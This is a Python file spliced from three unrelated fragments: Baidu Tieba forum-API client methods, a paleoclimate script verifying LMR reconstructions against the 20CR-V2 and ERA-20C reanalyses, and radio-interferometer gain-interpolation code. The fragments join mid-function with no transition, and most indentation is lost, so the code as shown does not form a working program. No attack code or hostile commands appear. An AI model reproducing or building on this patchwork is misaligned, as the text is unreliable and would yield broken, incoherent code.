common_proto = CommonReq_pb2.CommonReq()
common_proto.BDUSS = self.sessions.BDUSS
common_proto._client_version = self.sessions.latest_version
data_proto = SearchPostForumReqIdl_pb2.SearchPostForumReqIdl.DataReq()
data_proto.common.CopyFrom(common_proto)
data_proto.word = fname
req_proto = SearchPostForumReqIdl_pb2.SearchPostForumReqIdl()
req_proto.data.CopyFrom(data_proto)
try:
res = await self.sessions.app_proto.post(
"http://c.tieba.baidu.com/c/f/forum/searchPostForum?cmd=309466",
data=self.sessions._pack_proto_bytes(req_proto.SerializeToString()),
)
res_proto = SearchPostForumResIdl_pb2.SearchPostForumResIdl()
res_proto.ParseFromString(await res.content.read())
if int(res_proto.error.errorno):
raise ValueError(res_proto.error.errmsg)
tab_map = {tab_proto.tab_name: tab_proto.tab_id for tab_proto in res_proto.data.exact_match.tab_info}
except Exception as err:
LOG.warning(f"Failed to get tab_map of {fname}. reason:{err}")
tab_map = {}
return tab_map
async def get_recom_list(self, fname_or_fid: Union[str, int], pn: int = 1) -> Tuple[List[Tuple[Thread, int]], bool]:
"""
        Get page pn of the head moderator's recommended-thread history

        Args:
            fname_or_fid (str | int): Target forum name or fid; fid takes precedence
            pn (int, optional): Page number. Defaults to 1.

        Returns:
            tuple[list[tuple[Thread, int]], bool]: list[(recommended thread info, added page views)], whether there is a next page
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
payload = [
('BDUSS', self.sessions.BDUSS),
('_client_version', self.sessions.latest_version),
('forum_id', fid),
('pn', pn),
('rn', 30),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/f/bawu/getRecomThreadHistory", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', loads=JSON_DECODER.decode, content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
def _pack_data_dict(data_dict):
thread_dict = data_dict['thread_list']
thread = Thread(ParseDict(thread_dict, ThreadInfo_pb2.ThreadInfo(), ignore_unknown_fields=True))
add_view = thread.view_num - int(data_dict['current_pv'])
return thread, add_view
res_list = [_pack_data_dict(data_dict) for data_dict in res_json['recom_thread_list']]
has_more = bool(int(res_json['is_has_more']))
except Exception as err:
LOG.warning(f"Failed to get recom_list of {fname_or_fid}. reason:{err}")
res_list = []
has_more = False
return res_list, has_more
async def get_recom_status(self, fname_or_fid: Union[str, int]) -> Tuple[int, int]:
"""
        Get the monthly quota status of the head-moderator recommendation feature

        Args:
            fname_or_fid (str | int): Target forum name or fid; fid takes precedence

        Returns:
            tuple[int, int]: total recommendation quota this month, recommendation quota already used this month
"""
fid = fname_or_fid if isinstance(fname_or_fid, int) else await self.get_fid(fname_or_fid)
payload = [
('BDUSS', self.sessions.BDUSS),
('_client_version', self.sessions.latest_version),
('forum_id', fid),
('pn', 1),
('rn', 0),
]
try:
res = await self.sessions.app.post(
"http://c.tieba.baidu.com/c/f/bawu/getRecomThreadList", data=self.sessions._pack_form(payload)
)
res_json: dict = await res.json(encoding='utf-8', content_type=None)
if int(res_json['error_code']):
raise ValueError(res_json['error_msg'])
total_recom_num = int(res_json['total_recommend_num'])
used_recom_num = int(res_json['used_recommend_num'])
except Exception as err:
LOG.warning(f"Failed to get recom_status of {fname_or_fid}. reason:{err}")
total_recom_num = 0
used_recom_num = 0
return total_recom_num, used_recom_num
async def get_statistics(self, fname_or_fid: Union[str, int]) -> Dict[str, List[int]]:
"""
        Get the last 29 days of statistics from the forum-admin backend

        Args:
            fname_or_fid (str
# instance of the spherical harmonics object for the new grid
specob_new = Spharmt(nlon_new,nlat_new,gridtype='regular',legfunc='computed')
# loop over years of interest and transform...specify trange at top of file
iw = 0
if nya > 0:
    iw = (nya - 1) // 2  # integer division: iw is used as a whole-year window offset
cyears = list(range(trange[0],trange[1]))
lt_csave = np.zeros([len(cyears)])
le_csave = np.zeros([len(cyears)])
te_csave = np.zeros([len(cyears)])
lmr_allyears = np.zeros([len(cyears),nlat_new,nlon_new])
tcr_allyears = np.zeros([len(cyears),nlat_new,nlon_new])
era20c_allyears = np.zeros([len(cyears),nlat_new,nlon_new])
lmr_zm = np.zeros([len(cyears),nlat_new])
tcr_zm = np.zeros([len(cyears),nlat_new])
era20c_zm = np.zeros([len(cyears),nlat_new])
k = -1
for yr in cyears:
k = k + 1
LMR_smatch, LMR_ematch = find_date_indices(LMR_time,yr-iw,yr+iw+1)
TCR_smatch, TCR_ematch = find_date_indices(TCR_time,yr-iw,yr+iw+1)
ERA20C_smatch, ERA20C_ematch = find_date_indices(ERA20C_time,yr-iw,yr+iw+1)
print('------------------------------------------------------------------------')
print('working on year... %5s' % str(yr))
print(' %5s LMR index= %5s : LMR year= %5s' % (str(yr), str(LMR_smatch),str(LMR_time[LMR_smatch])))
# LMR
pdata_lmr = np.mean(LMR[LMR_smatch:LMR_ematch,:,:],0)
lmr_trunc = regrid(specob_lmr, specob_new, pdata_lmr, ntrunc=nlat_new-1, smooth=None)
# TCR
if TCR_smatch and TCR_ematch:
pdata_tcr = np.mean(TCR[TCR_smatch:TCR_ematch,:,:],0)
else:
pdata_tcr = np.zeros(shape=[nlat_TCR,nlon_TCR])
pdata_tcr.fill(np.nan)
# regrid on LMR grid
if np.isnan(pdata_tcr).all():
tcr_trunc = np.zeros(shape=[nlat_new,nlon_new])
tcr_trunc.fill(np.nan)
else:
tcr_trunc = regrid(specob_tcr, specob_new, pdata_tcr, ntrunc=nlat_new-1, smooth=None)
# ERA20C
if ERA20C_smatch and ERA20C_ematch:
pdata_era20c = np.mean(ERA20C[ERA20C_smatch:ERA20C_ematch,:,:],0)
else:
pdata_era20c = np.zeros(shape=[nlat_ERA20C,nlon_ERA20C])
pdata_era20c.fill(np.nan)
# regrid on LMR grid
if np.isnan(pdata_era20c).all():
era20c_trunc = np.zeros(shape=[nlat_new,nlon_new])
era20c_trunc.fill(np.nan)
else:
era20c_trunc = regrid(specob_era20c, specob_new, pdata_era20c, ntrunc=nlat_new-1, smooth=None)
if iplot_individual_years:
# Reanalysis comparison figures (annually-averaged anomaly fields)
#fmin = -60.0; fmax = +60.0; nflevs=41
fmin = verif_dict[var][3]; fmax = verif_dict[var][4]; nflevs=41
fig = plt.figure()
ax = fig.add_subplot(3,1,1)
LMR_plotter(lmr_trunc*verif_dict[var][6],lat2_new,lon2_new,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
plt.title('LMR '+'T'+str(nlat_new-ifix)+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
plt.clim(fmin,fmax)
ax = fig.add_subplot(3,1,2)
LMR_plotter(tcr_trunc*verif_dict[var][6],lat2_new,lon2_new,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
plt.title('20CR-V2 '+'T'+str(nlat_new-ifix)+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
#LMR_plotter(pdata_tcr*verif_dict[var][6],lat2_TCR,lon2_TCR,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
#plt.title('20CR-V2 '+'orig. grid'+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
plt.clim(fmin,fmax)
ax = fig.add_subplot(3,1,3)
LMR_plotter(era20c_trunc*verif_dict[var][6],lat2_new,lon2_new,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
plt.title('ERA-20C '+'T'+str(nlat_new-ifix)+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
#LMR_plotter(pdata_era20c*verif_dict[var][6],lat2_ERA20C,lon2_ERA20C,'bwr',nflevs,vmin=fmin,vmax=fmax,extend='both')
#plt.title('ERA-20C '+'orig. grid'+' '+verif_dict[var][1]+' anom. '+verif_dict[var][5]+' '+str(yr), fontweight='bold')
plt.clim(fmin,fmax)
fig.tight_layout()
plt.savefig(nexp+'_LMR_TCR_ERA20C_'+verif_dict[var][1]+'anom_'+str(yr)+'.png')
plt.close()
# save the full grids
lmr_allyears[k,:,:] = lmr_trunc
tcr_allyears[k,:,:] = tcr_trunc
era20c_allyears[k,:,:] = era20c_trunc
# -----------------------
# zonal-mean verification
# -----------------------
# LMR
lmr_zm[k,:] = np.mean(lmr_trunc,1)
# TCR
fracok = np.sum(np.isfinite(tcr_trunc),axis=1,dtype=np.float16)/float(nlon_TCR)
boolok = np.where(fracok >= valid_frac)
boolnotok = np.where(fracok < valid_frac)
for i in boolok:
tcr_zm[k,i] = np.nanmean(tcr_trunc[i,:],axis=1)
    tcr_zm[k,boolnotok] = np.nan
# ERA
fracok = np.sum(np.isfinite(era20c_trunc),axis=1,dtype=np.float16)/float(nlon_ERA20C)
boolok = np.where(fracok >= valid_frac)
boolnotok = np.where(fracok < valid_frac)
for i in boolok:
era20c_zm[k,i] = np.nanmean(era20c_trunc[i,:],axis=1)
    era20c_zm[k,boolnotok] = np.nan
if iplot_loc:
ncints = 30
cmap = 'bwr'
nticks = 6 # number of ticks on the colorbar
# set contours based on 20CR
maxabs = np.nanmax(np.abs(tcr_trunc))
# round the contour interval, and then set limits to fit
dc = np.round(maxabs*2/ncints,2)
cl = dc*ncints/2.
cints = np.linspace(-cl,cl,ncints,endpoint=True)
# compare LMR and TCR and ERA20C
fig = plt.figure()
ax = fig.add_subplot(2,2,1)
m1 = bm.Basemap(projection='robin',lon_0=0)
# maxabs = np.nanmax(np.abs(lmr_trunc))
cs = m1.contourf(lon2_new,lat2_new,lmr_trunc,cints,cmap=plt.get_cmap(cmap),vmin=-maxabs,vmax=maxabs)
m1.drawcoastlines()
cb = m1.colorbar(cs)
tick_locator = ticker.MaxNLocator(nbins=nticks)
cb.locator = tick_locator
cb.ax.yaxis.set_major_locator(matplotlib.ticker.AutoLocator())
cb.update_ticks()
ax.set_title('LMR '+verif_dict[var][1]+' '+str(ntrunc_new) + ' ' + str(yr))
ax = fig.add_subplot(2,2,2)
m2 = bm.Basemap(projection='robin',lon_0=0)
# maxabs = np.nanmax(np.abs(tcr_trunc))
cs = m2.contourf(lon2_new,lat2_new,tcr_trunc,cints,cmap=plt.get_cmap(cmap),vmin=-maxabs,vmax=maxabs)
m2.drawcoastlines()
        cb = m2.colorbar(cs)  # attach to this panel's basemap (was m1, a copy-paste slip)
tick_locator = ticker.MaxNLocator(nbins=nticks)
cb.locator = tick_locator
cb.ax.yaxis.set_major_locator(matplotlib.ticker.AutoLocator())
cb.update_ticks()
ax.set_title('20CR-V2 '+verif_dict[var][1]+' '+str(ntrunc_new) + ' ' + str(yr))
ax = fig.add_subplot(2,2,3)
m3 = bm.Basemap(projection='robin',lon_0=0)
# maxabs = np.nanmax(np.abs(gis_trunc))
cs = m3.contourf(lon2_new,lat2_new,era20c_trunc,cints,cmap=plt.get_cmap(cmap),vmin=-maxabs,vmax=maxabs)
m3.drawcoastlines()
        cb = m3.colorbar(cs)  # attach to this panel's basemap (was m1, a copy-paste slip)
tick_locator = ticker.MaxNLocator(nbins=nticks)
cb.locator = tick_locator
cb.ax.yaxis.set_major_locator(matplotlib.ticker.AutoLocator())
cb.update_ticks()
ax.set_title('ERA20C '+verif_dict[var][1]+' '+str(ntrunc_new) + ' ' + str(yr))
plt.clim(-maxabs,maxabs)
# get these numbers by adjusting the figure interactively!!!
plt.subplots_adjust(left=0.05, bottom=0.45, right=0.95, top=0.95, wspace=0.1, hspace=0.0)
# plt.tight_layout(pad=0.3)
fig.suptitle(verif_dict[var][1] + ' for ' +str(nya) +' year centered average')
# anomaly correlation
lmrvec = np.reshape(lmr_trunc,(1,nlat_new*nlon_new))
tcrvec = np.reshape(tcr_trunc,(1,nlat_new*nlon_new))
era20cvec = np.reshape(era20c_trunc,(1,nlat_new*nlon_new))
# lmr <-> tcr
indok = np.isfinite(tcrvec); nbok = np.sum(indok); nball = tcrvec.shape[1]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
lt_csave[k] = np.corrcoef(lmrvec[indok],tcrvec[indok])[0,1]
else:
lt_csave[k] = np.nan
print(' lmr-tcr correlation : %s' % str(lt_csave[k]))
# lmr <-> era
indok = np.isfinite(era20cvec); nbok = np.sum(indok); nball = era20cvec.shape[1]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
le_csave[k] = np.corrcoef(lmrvec[indok],era20cvec[indok])[0,1]
else:
le_csave[k] = np.nan
print(' lmr-era correlation : %s' % str(le_csave[k]))
# tcr <-> era
    indok = np.isfinite(tcrvec) & np.isfinite(era20cvec); nbok = np.sum(indok); nball = era20cvec.shape[1]  # mask where either field is missing
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
te_csave[k] = np.corrcoef(tcrvec[indok],era20cvec[indok])[0,1]
else:
te_csave[k] = np.nan
print(' tcr-era correlation : %s' % str(te_csave[k]))
# plots for anomaly correlation statistics
# number of bins in the histograms
nbins = 15
corr_range = [-0.6,1.0]
bins = np.linspace(corr_range[0],corr_range[1],nbins)
# LMR compared to TCR and ERA20C
fig = plt.figure()
# TCR
ax = fig.add_subplot(3,2,1)
ax.plot(cyears,lt_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('LMR - 20CR-V2')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
#
ax = fig.add_subplot(3,2,2)
ax.hist(lt_csave[~np.isnan(lt_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('LMR - 20CR-V2')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(lt_csave)),fontsize=11,fontweight='bold')
# ERA20C
ax = fig.add_subplot(3,2,3)
ax.plot(cyears,le_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('LMR - ERA-20C')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
#
ax = fig.add_subplot(3,2,4)
ax.hist(le_csave[~np.isnan(le_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('LMR - ERA-20C')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(le_csave)),fontsize=11,fontweight='bold')
# ERA20C compared to TCR
ax = fig.add_subplot(3,2,5)
ax.plot(cyears,te_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('ERA-20C - 20CR-V2')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
ax.set_xlabel('Year CE',fontweight='bold')
#
ax = fig.add_subplot(3,2,6)
ax.hist(te_csave[~np.isnan(te_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('ERA-20C - 20CR-V2')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
ax.set_xlabel('Correlation',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(te_csave)),fontsize=11,fontweight='bold')
#fig.tight_layout()
plt.subplots_adjust(left=0.1, bottom=0.45, right=0.95, top=0.93, wspace=0.5, hspace=0.5)
fig.suptitle(verif_dict[var][2]+' anomaly correlation',fontweight='bold')
if fsave:
print('saving to .png')
plt.savefig(nexp+'_verify_grid_'+verif_dict[var][1]+'_anomaly_correlation_LMR_'+str(trange[0])+'-'+str(trange[1])+'.png')
plt.savefig(nexp+'_verify_grid_'+verif_dict[var][1]+'_anomaly_correlation_LMR_'+str(trange[0])+'-'+str(trange[1])+'.pdf', bbox_inches='tight', dpi=300, format='pdf')
plt.close()
# =======================================================================================================
# For paper 1 :
fig = plt.figure()
# TCR
ax = fig.add_subplot(2,2,1)
ax.plot(cyears,lt_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('LMR - 20CR-V2')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
ax = fig.add_subplot(2,2,2)
ax.hist(lt_csave[~np.isnan(lt_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('LMR - 20CR-V2')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(lt_csave)),fontsize=11,fontweight='bold')
# ERA20C
ax = fig.add_subplot(2,2,3)
ax.plot(cyears,le_csave,lw=2)
ax.plot([trange[0],trange[-1]],[0,0],'k:')
ax.set_title('LMR - ERA-20C')
ax.set_xlim(trange[0],trange[-1])
ax.set_ylim(corr_range[0],corr_range[-1])
ax.set_ylabel('Correlation',fontweight='bold')
ax.set_xlabel('Year CE',fontweight='bold')
#
ax = fig.add_subplot(2,2,4)
ax.hist(le_csave[~np.isnan(le_csave)],bins=bins,histtype='stepfilled',alpha=0.25)
ax.set_title('LMR - ERA-20C')
ax.set_xlim(corr_range[0],corr_range[-1])
ax.set_ylabel('Counts',fontweight='bold')
ax.set_xlabel('Correlation',fontweight='bold')
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ypos = ymax-0.15*(ymax-ymin)
xpos = xmin+0.025*(xmax-xmin)
ax.text(xpos,ypos,'Mean = %s' %"{:.2f}".format(np.nanmean(le_csave)),fontsize=11,fontweight='bold')
fig.tight_layout()
plt.subplots_adjust(left=0.1, bottom=0.45, right=0.95, top=0.93, wspace=0.5, hspace=0.5)
fig.suptitle(verif_dict[var][2]+' anomaly correlation',fontweight='bold')
plt.savefig(nexp+'_verify_grid_'+verif_dict[var][1]+'_anomaly_correlation_LMR_'+str(trange[0])+'-'+str(trange[1])+'_paper.png')
plt.savefig(nexp+'_verify_grid_'+verif_dict[var][1]+'_anomaly_correlation_LMR_'+str(trange[0])+'-'+str(trange[1])+'_paper.pdf', bbox_inches='tight', dpi=300, format='pdf')
plt.close()
# =======================================================================================================
#
# BEGIN bias, r and CE calculations
#
# correlation and CE at each (lat,lon) point
lt_err = lmr_allyears - tcr_allyears
le_err = lmr_allyears - era20c_allyears
te_err = tcr_allyears - era20c_allyears
r_lt = np.zeros([nlat_new,nlon_new])
ce_lt = np.zeros([nlat_new,nlon_new])
r_le = np.zeros([nlat_new,nlon_new])
ce_le = np.zeros([nlat_new,nlon_new])
r_te = np.zeros([nlat_new,nlon_new])
ce_te = np.zeros([nlat_new,nlon_new])
# bias
# CE
ce_lt = coefficient_efficiency(tcr_allyears,lmr_allyears)
ce_le = coefficient_efficiency(era20c_allyears,lmr_allyears)
ce_te = coefficient_efficiency(era20c_allyears,tcr_allyears)
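# For reference, a minimal sketch of the skill score coefficient_efficiency()
# is assumed to compute here (a Nash-Sutcliffe style coefficient of efficiency
# over the time axis); the project's real implementation lives elsewhere and
# may differ, e.g. in its NaN handling:
def _ce_reference_sketch(ref, test):
    # CE = 1 - SS_err / SS_ref, evaluated independently at each grid point
    err = test - ref
    ss_err = np.nansum(err**2, axis=0)
    ss_ref = np.nansum((ref - np.nanmean(ref, axis=0))**2, axis=0)
    return 1.0 - ss_err / ss_ref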
# Correlation
for la in range(nlat_new):
for lo in range(nlon_new):
# LMR-TCR
indok = np.isfinite(tcr_allyears[:,la,lo])
nbok = np.sum(indok)
nball = lmr_allyears[:,la,lo].shape[0]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
r_lt[la,lo] = np.corrcoef(lmr_allyears[indok,la,lo],tcr_allyears[indok,la,lo])[0,1]
else:
r_lt[la,lo] = np.nan
# LMR-ERA20C
indok = np.isfinite(era20c_allyears[:,la,lo])
nbok = np.sum(indok)
nball = lmr_allyears[:,la,lo].shape[0]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
r_le[la,lo] = np.corrcoef(lmr_allyears[indok,la,lo],era20c_allyears[indok,la,lo])[0,1]
else:
r_le[la,lo] = np.nan
# TCR-ERA20C
indok = np.isfinite(era20c_allyears[:,la,lo])
nbok = np.sum(indok)
nball = tcr_allyears[:,la,lo].shape[0]
ratio = float(nbok)/float(nball)
if ratio > valid_frac:
r_te[la,lo] = np.corrcoef(tcr_allyears[indok,la,lo],era20c_allyears[indok,la,lo])[0,1]
else:
r_te[la,lo] = np.nan
# median
lat_trunc = np.squeeze(lat2_new[:,0])
indlat = np.where((lat_trunc[:] > -60.0) & (lat_trunc[:] < 60.0))
lt_rmedian = str(float('%.2g' % np.median(r_lt)))
print('lmr-tcr all-grid median r : %s' % str(lt_rmedian))
lt_rmedian60 = str(float('%.2g' % np.median(r_lt[indlat,:])))
print('lmr-tcr 60S-60N median r : %s' % str(lt_rmedian60))
lt_cemedian = str(float('%.2g' % np.median(ce_lt)))
print('lmr-tcr all-grid median ce : %s' % str(lt_cemedian))
lt_cemedian60 = str(float('%.2g' % np.median(ce_lt[indlat,:])))
print('lmr-tcr 60S-60N median ce : %s' % str(lt_cemedian60))
le_rmedian = str(float('%.2g' % np.median(r_le)))
print('lmr-era20c all-grid median r : %s' % str(le_rmedian))
le_rmedian60 = str(float('%.2g' % np.median(r_le[indlat,:])))
print('lmr-era20c 60S-60N median r : %s' % str(le_rmedian60))
le_cemedian = str(float('%.2g' % np.median(ce_le)))
print('lmr-era20c all-grid median ce : %s' % str(le_cemedian))
le_cemedian60 = str(float('%.2g' % np.median(ce_le[indlat,:])))
print('lmr-era20c 60S-60N median ce : %s' % str(le_cemedian60))
te_rmedian = str(float('%.2g' % np.median(r_te)))
print('tcr-era20c all-grid median r : %s' % str(te_rmedian))
te_rmedian60 = str(float('%.2g' % np.median(r_te[indlat,:])))
print('tcr-era20c 60S-60N median r : %s' % str(te_rmedian60))
te_cemedian = str(float('%.2g' % np.median(ce_te)))
print('tcr-era20c all-grid median ce : %s' % str(te_cemedian))
te_cemedian60 = str(float('%.2g' % np.median(ce_te[indlat,:])))
print('tcr-era20c 60S-60N median ce : %s' % str(te_cemedian60))
        tvec = tgrid.ravel()
fvec = fgrid.ravel()
if key == 'antenna-based':
ind1 = NMO.find_list_in_list(labels, a1_labels)
ind2 = NMO.find_list_in_list(labels, a2_labels)
if NP.sum(ind1.mask) > 0:
raise IndexError('Some antenna gains could not be found')
if NP.sum(ind2.mask) > 0:
raise IndexError('Some antenna gains could not be found')
g1_conj = None
g2 = None
            for i in range(ind1.size):  # range() for Python 3 (was xrange)
if self.splinefuncs[key]['dims'].size == 1:
if g1_conj is None:
g1_conj = (self.splinefuncs[key]['interp']['real'][ind1[i]](inp) - 1j * self.splinefuncs[key]['interp']['imag'][ind1[i]](inp)).reshape(1,nchan,ntimes)
g2 = (self.splinefuncs[key]['interp']['real'][ind2[i]](inp) + 1j * self.splinefuncs[key]['interp']['imag'][ind2[i]](inp)).reshape(1,nchan,ntimes)
else:
g1_conj = NP.concatenate((g1_conj, (self.splinefuncs[key]['interp']['real'][ind1[i]](inp) - 1j * self.splinefuncs[key]['interp']['imag'][ind1[i]](inp)).reshape(1,nchan,ntimes)), axis=0)
g2 = NP.concatenate((g2, (self.splinefuncs[key]['interp']['real'][ind2[i]](inp) + 1j * self.splinefuncs[key]['interp']['imag'][ind2[i]](inp)).reshape(1,nchan,ntimes)), axis=0)
else:
if g1_conj is None:
g1_conj = (self.splinefuncs[key]['interp']['real'][ind1[i]].ev(tvec,fvec) - 1j * self.splinefuncs[key]['interp']['imag'][ind1[i]].ev(tvec,fvec)).reshape(1,nchan,ntimes)
g2 = (self.splinefuncs[key]['interp']['real'][ind2[i]].ev(tvec,fvec) + 1j * self.splinefuncs[key]['interp']['imag'][ind2[i]].ev(tvec,fvec)).reshape(1,nchan,ntimes)
else:
g1_conj = NP.concatenate((g1_conj, (self.splinefuncs[key]['interp']['real'][ind1[i]].ev(tvec,fvec) - 1j * self.splinefuncs[key]['interp']['imag'][ind1[i]].ev(tvec,fvec)).reshape(1,nchan,ntimes)), axis=0)
g2 = NP.concatenate((g2, (self.splinefuncs[key]['interp']['real'][ind2[i]].ev(tvec,fvec) + 1j * self.splinefuncs[key]['interp']['imag'][ind2[i]].ev(tvec,fvec)).reshape(1,nchan,ntimes)), axis=0)
            blgains = blgains * g1_conj * g2 * NP.ones((1,nchan,ntimes), dtype=complex)  # NP.complex was removed in NumPy 1.20+; use the builtin
else:
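# Baseline-based gains: look up each baseline label directly; if only the
# reversed label (A2,A1) is tabulated, use its complex conjugate; fall back
# to unit gains for baselines absent from the table.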
g12 = None
for labelind,label in enumerate(bl_labels):
if label in labels:
ind = NP.where(self.gaintable[key]['label'] == label)[0]
if self.splinefuncs[key]['dims'].size == 1:
if g12 is None:
g12 = (self.splinefuncs[key]['interp']['real'][ind[0]](inp) + 1j * self.splinefuncs[key]['interp']['imag'][ind[0]](inp)).reshape(1,nchan,ntimes)
else:
g12 = NP.concatenate((g12, (self.splinefuncs[key]['interp']['real'][ind[0]](inp) + 1j * self.splinefuncs[key]['interp']['imag'][ind[0]](inp)).reshape(1,nchan,ntimes)), axis=0)
else:
if g12 is None:
g12 = (self.splinefuncs[key]['interp']['real'][ind[0]].ev(tvec,fvec) + 1j * self.splinefuncs[key]['interp']['imag'][ind[0]].ev(tvec,fvec)).reshape(1,nchan,ntimes)
else:
g12 = NP.concatenate((g12, (self.splinefuncs[key]['interp']['real'][ind[0]].ev(tvec,fvec) + 1j * self.splinefuncs[key]['interp']['imag'][ind[0]].ev(tvec,fvec)).reshape(1,nchan,ntimes)), axis=0)
elif NP.asarray([tuple(reversed(label))], dtype=bl_labels.dtype)[0] in labels:
ind = NP.where(labels == NP.asarray([tuple(reversed(label))], dtype=bl_labels.dtype)[0])[0]
if self.splinefuncs[key]['dims'].size == 1:
if g12 is None:
g12 = (self.splinefuncs[key]['interp']['real'][ind[0]](inp) - 1j * self.splinefuncs[key]['interp']['imag'][ind[0]](inp)).reshape(1,nchan,ntimes)
else:
g12 = NP.concatenate((g12, (self.splinefuncs[key]['interp']['real'][ind[0]](inp) - 1j * self.splinefuncs[key]['interp']['imag'][ind[0]](inp)).reshape(1,nchan,ntimes)), axis=0)
else:
if g12 is None:
g12 = (self.splinefuncs[key]['interp']['real'][ind[0]].ev(tvec,fvec) - 1j * self.splinefuncs[key]['interp']['imag'][ind[0]].ev(tvec,fvec)).reshape(1,nchan,ntimes)
else:
g12 = NP.concatenate((g12, (self.splinefuncs[key]['interp']['real'][ind[0]].ev(tvec,fvec) - 1j * self.splinefuncs[key]['interp']['imag'][ind[0]].ev(tvec,fvec)).reshape(1,nchan,ntimes)), axis=0)
else:
if g12 is None:
g12 = NP.ones((1,nchan,ntimes), dtype=complex)
else:
g12 = NP.concatenate((g12, NP.ones((1,nchan,ntimes), dtype=complex)), axis=0)
blgains = blgains * g12 * NP.ones((1,nchan,ntimes), dtype=complex)
interp_axes_order = ['label', 'frequency', 'time']
if axes_order is None:
axes_order = self.gaintable['antenna-based']['ordering']
elif not isinstance(axes_order, (list, NP.ndarray)):
raise TypeError('axes_order must be a list')
else:
if len(axes_order) != 3:
raise ValueError('axes_order must be a three element list')
for orderkey in ['label', 'frequency', 'time']:
if orderkey not in axes_order:
raise ValueError('axes_order does not contain key "{0}"'.format(orderkey))
transpose_order = NMO.find_list_in_list(interp_axes_order, axes_order)
blgains = NP.transpose(blgains, axes=transpose_order)
return blgains
#############################################################################
def nearest_gains(self, bl_labels, freqs=None, times=None, axes_order=None):
"""
------------------------------------------------------------------------
Extract complex instrument gains for given baselines from the gain table
determined by nearest neighbor logic
Inputs:
bl_labels [Numpy structured array tuples] Labels of antennas in the
pair used to produce the baseline vector under fields 'A2'
and 'A1' for second and first antenna respectively. The
baseline vector is obtained by position of antennas under
'A2' minus position of antennas under 'A1'
freqs [None or numpy array] Array of frequencies at which the
gains are to be interpolated using the attribute
splinefuncs. If set to None (default), all frequencies in
the gaintable are assumed. The specified frequencies must
always lie within the range which was used in creating the
interpolation functions, otherwise an exception will be
raised. The array is of size nchan
times [None or numpy array] Array of times at which the gains
are to be interpolated using the attribute splinefuncs. If
set to None (default), all times in the gaintable are
assumed. The specified times must always lie within the
range which was used in creating the interpolation
functions, otherwise an exception will be raised. The array
is of size nts
axes_order [None or list or numpy array] Axes ordering for extracted
gains. It must contain the three elements 'label',
'frequency', and 'time'. If set to None, it will be
returned in the same order as in the input gaintable.
Outputs:
[numpy array] Complex gains of shape nbl x nchan x nts for the specified
baselines, frequencies and times.
------------------------------------------------------------------------
"""
try:
bl_labels
except NameError:
raise NameError('Input bl_labels must be specified')
blgains = NP.asarray(1.0).reshape(1,1,1)
if self.gaintable is not None:
a1_labels = bl_labels['A1']
a2_labels = bl_labels['A2']
for gainkey in ['antenna-based', 'baseline-based']:
if gainkey in self.gaintable:
temp_axes_order = ['label', 'frequency', 'time']
inp_order = self.gaintable[gainkey]['ordering']
temp_transpose_order = NMO.find_list_in_list(inp_order, temp_axes_order)
if NP.all(inp_order == temp_axes_order):
